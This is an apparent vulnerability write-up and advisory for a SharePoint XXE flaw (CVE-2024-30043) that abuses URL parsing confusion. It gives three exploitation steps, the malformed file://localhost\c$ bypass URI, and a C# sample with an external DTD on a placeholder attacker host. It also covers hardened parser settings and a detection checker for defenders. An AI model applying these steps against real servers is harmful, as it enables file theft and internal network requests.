Full Report
XML eXternal Entity (XXE) injection is a vulnerability in XML parsing that lets an attacker declare entities which the parser then resolves, leading to file reads, SSRF and other issues. Most of the time, XXE bugs are fairly simple, but this one hinged on a weird URL parsing issue.

Microsoft.SharePoint.WebControls.BaseXmlDataSource is a class in Microsoft SharePoint for loading XML data sources onto a SharePoint page, and the data source URL can be set to an arbitrary value. While reading code that claimed to have XXE protections, the author tried to include a DTD, and it surprisingly worked! According to the author, code that properly blocks DTD inclusion in .NET is pretty rare. So, what was going on? The reader hands the entities to its resolver first and only THEN performs the DtdProcessing.Prohibit check. An exception does get thrown, but NOT before the request has already been made.

XmlSecureResolver adds its own URL check to prevent arbitrary domains from being reached: the domain an external entity is pulled from MUST be the same as the domain the data source itself is requested from. The end goal was therefore an XmlSecureResolver policy that allows both reading local files and making HTTP requests. In other words, trick the policy writer into handing out an unrestricted policy while still being able to fetch attacker-controlled data. This is a classic situation where URL parsing differences really matter.

After tinkering around for a few hours, the author arrived at file://localhost\c$/sites/mysite/test.xml. Because this is a file URI, the domain restriction gets ignored and the resolver's policy comes back unrestricted. Next, the tail of the path, /sites/mysite/test.xml, is looked up as a local file path, and that is a location the attacker can write to anyway (step 1 below). With this, the XXE bug becomes exploitable. Here are the steps:

1. Upload the malicious XML file to SharePoint as part of a site. A low-privileged user can do this.
2. Create a page whose data source is the malformed URL above. This step retrieves the malicious XML, and XmlSecureResolver creates a policy based on the URL without any restrictions.
3. The malicious XML triggers the XXE bug. Even though the DTD-prohibited exception is still thrown, it comes too late in the processing: the requests to retrieve arbitrary files, such as win.ini, have already been made.

I found it really fun that the error is only triggered after the processing. It's a good reminder to always look for side effects of a request that are not directly returned in the response. Overall, a really good write-up! I enjoyed the images throughout, as it was a difficult bug to think about.
Analysis Summary
# Vulnerability: URL Parsing Confusion Leading to XXE in SharePoint
## CVE Details
- **CVE ID**: CVE-2024-30043
- **CVSS Score**: 7.1 (High)
- **CWE**: CWE-611 (Improper Restriction of XML External Entity Reference)
## Affected Systems
- **Products**: Microsoft SharePoint Server, SharePoint Cloud (Microsoft 365)
- **Versions**: Supported versions of SharePoint Server 2016, 2019, and Subscription Edition (prior to May 2024 patches).
- **Configurations**: Any SharePoint site where a user has permissions to add or modify web parts (specifically `BaseXmlDataSource` controls).
## Vulnerability Description
The vulnerability exists in the `Microsoft.SharePoint.WebControls.BaseXmlDataSource` class. While the code attempts to block DTD processing using `XmlReaderSettings.DtdProcessing = DtdProcessing.Prohibit`, a logic flaw in .NET's `XmlReader` implementation causes it to handle parameter entities via the assigned `XmlResolver` *before* conducting the prohibition check.
Furthermore, an attacker can bypass `XmlSecureResolver` restrictions by exploiting URL parsing confusion. By using a malformed URI (e.g., `file://localhost\c$/path/to/malicious.xml`), the resolver perceives the path as local/internal and grants an unrestricted policy. This allows an attacker to trigger an Out-of-Band (OOB) XXE attack that executes before the application throws a DTD exception.
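The resolver-plus-Prohibit pattern described above (and in the Full Report) beside the hardened form, as an added C# example; it is not SharePoint's code and not the ZDI author's. It assumes .NET Framework, where `XmlSecureResolver` still derives a permission policy from the security URL (the class is obsolete on .NET 5 and later), and the sample document and the `attacker.invalid` host name are constructed for illustration:

```csharp
using System;
using System.IO;
using System.Xml;

// Added example, not SharePoint or ZDI code. Targets .NET Framework.
public static class XxeSettingsDemo
{
    // Constructed sample: a document whose DOCTYPE points at an external DTD.
    // The host name is a reserved placeholder, not a real server.
    public const string SampleXml =
        "<?xml version=\"1.0\"?>\n" +
        "<!DOCTYPE data SYSTEM \"http://attacker.invalid/evil.dtd\">\n" +
        "<data>hello</data>";

    // The pattern the write-up describes: Prohibit is set, but a resolver is still
    // attached, and its policy is derived from the attacker-influenced data source URL.
    // The write-up's finding is that the resolver is consulted before Prohibit fires.
    public static XmlReaderSettings PatternFromWriteup(string dataSourceUrl)
    {
        var settings = new XmlReaderSettings();
        settings.DtdProcessing = DtdProcessing.Prohibit;
        settings.XmlResolver = new XmlSecureResolver(new XmlUrlResolver(), dataSourceUrl);
        return settings;
    }

    // Hardened form: no resolver at all, so nothing can fetch an external DTD or
    // entity regardless of when the Prohibit check happens.
    public static XmlReaderSettings HardenedSettings()
    {
        var settings = new XmlReaderSettings();
        settings.DtdProcessing = DtdProcessing.Prohibit;
        settings.XmlResolver = null;
        return settings;
    }

    // Parse content that has already been fetched into memory. Fetching the data
    // source is done separately (against an allow-list of hosts), so the XML parser
    // itself never sees a URL and has nothing it could resolve.
    public static bool TryParse(string xml, XmlReaderSettings settings, out string error)
    {
        error = null;
        try
        {
            using (var reader = XmlReader.Create(new StringReader(xml), settings))
            {
                while (reader.Read()) { }
            }
            return true;
        }
        catch (XmlException ex)
        {
            error = ex.Message;
            return false;
        }
    }

    public static void Main()
    {
        string error;
        bool ok = TryParse(SampleXml, HardenedSettings(), out error);
        // With no resolver, the DOCTYPE is rejected outright and no request is made.
        Console.WriteLine(ok ? "parsed" : "rejected: " + error);
    }
}
```

`PatternFromWriteup` is only constructed here, never run against the sample, because with a resolver attached the parser would attempt the external fetch. The hardened path rejects the document with the standard `XmlException` stating that DTD is prohibited, and the distinction worth remembering is that the rejection happens with no resolver available, not merely before one is used.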
## Exploitation
- **Status**: PoC available/detailed in research; patched by vendor.
- **Complexity**: Medium (Requires understanding of .NET XML resolver behavior and URL path manipulation).
- **Attack Vector**: Network (Authenticated). Requires low-privileged user access to upload a file and modify a page.
## Impact
- **Confidentiality**: High (arbitrary file read with the SharePoint farm service account's permissions; SSRF to internal resources; the forced outbound requests can also expose the service account to NTLM relaying).
- **Integrity**: None.
- **Availability**: Low (resource exhaustion via forced outbound requests).
## Remediation
### Patches
- Microsoft released security updates addressing this vulnerability in the **May 2024 Patch Tuesday** cycle. Administrators should update SharePoint Server to the latest build.
### Workarounds
- Restrict permissions for low-privileged users to prevent them from adding or modifying Data Source controls on SharePoint pages.
- Monitor for unusual outbound HTTP/SMB traffic from SharePoint servers to untrusted internal or external IP addresses.
## Detection
- **Indicators of Compromise**:
- Presence of `file://localhost\c$...` or similar malformed URIs in SharePoint WebPart configurations.
- Unexpected outbound requests from the SharePoint Service Account.
- **Detection methods**: Review SharePoint ULS (Unified Logging Service) logs for `XmlException` entries stating that DTD is prohibited ("For security reasons DTD is prohibited in this XML document") that occur immediately after a data source fetch from an unknown XML source. Note that the exception is thrown after the fetch, so its presence does not mean the request was blocked.
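A configuration check for the indicator above, added here as example code rather than any SharePoint tooling: it classifies data source values as they might be pulled from exported web part properties and flags the backslash-in-authority form, file-scheme sources, and a few related shapes. The rules and the sample values are assumptions made for illustration, not an official validation routine.

```csharp
using System;
using System.Collections.Generic;

// Added example, not SharePoint code: triage of data source values from web part configs.
public static class DataSourceUrlCheck
{
    // Returns true when a value deserves review; reason explains which rule fired.
    public static bool IsSuspicious(string value, out string reason)
    {
        reason = null;
        if (string.IsNullOrWhiteSpace(value)) return false;
        string v = value.Trim();

        // A backslash anywhere in the value is the tell for file://localhost\c$/...:
        // it lets different parsers disagree about where the host ends and the path begins.
        if (v.Contains("\\")) { reason = "backslash in URL"; return true; }

        // Plain server-relative paths are the ordinary SharePoint form.
        if (v.StartsWith("/") && !v.StartsWith("//")) return false;

        Uri uri;
        if (!Uri.TryCreate(v, UriKind.Absolute, out uri))
        { reason = "not a parseable absolute URL"; return true; }

        if (uri.Scheme == Uri.UriSchemeFile)
        { reason = "file scheme: the resolver treats the source as local and relaxes its policy"; return true; }

        if (uri.Scheme != Uri.UriSchemeHttp && uri.Scheme != Uri.UriSchemeHttps)
        { reason = "unexpected scheme " + uri.Scheme; return true; }

        if (uri.IsLoopback)
        { reason = "loopback host: data source points back at the server itself"; return true; }

        return false;
    }

    public static void Main()
    {
        // Constructed sample values; the host names are placeholders.
        var samples = new List<string>
        {
            "/sites/mysite/Shared Documents/feed.xml",
            "https://feeds.contoso.example/catalog.xml",
            "file://localhost\\c$/sites/mysite/test.xml",
            "file:///C:/inetpub/wwwroot/feed.xml",
            "http://127.0.0.1/_layouts/feed.xml",
            "ftp://files.contoso.example/feed.xml",
        };

        foreach (string s in samples)
        {
            string why;
            bool flagged = IsSuspicious(s, out why);
            Console.WriteLine((flagged ? "SUSPICIOUS " : "ok         ") + s
                + (flagged ? "  [" + why + "]" : ""));
        }
    }
}
```

The backslash rule runs before any `Uri` parsing on purpose: the whole point of the malformed value is that parsers normalise it differently, so the check should look at the raw string rather than at whatever `Uri` decides the host and path are.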
## References
- **Vendor Advisory**: [https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30043](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30043)
- **ZDI Analysis**: [https://www.zerodayinitiative.com/blog/2024/5/30/cve-2024-30043-abusing-url-parsing-confusion-to-exploit-xxe-on-sharepoint-server-and-cloud](https://www.zerodayinitiative.com/blog/2024/5/30/cve-2024-30043-abusing-url-parsing-confusion-to-exploit-xxe-on-sharepoint-server-and-cloud)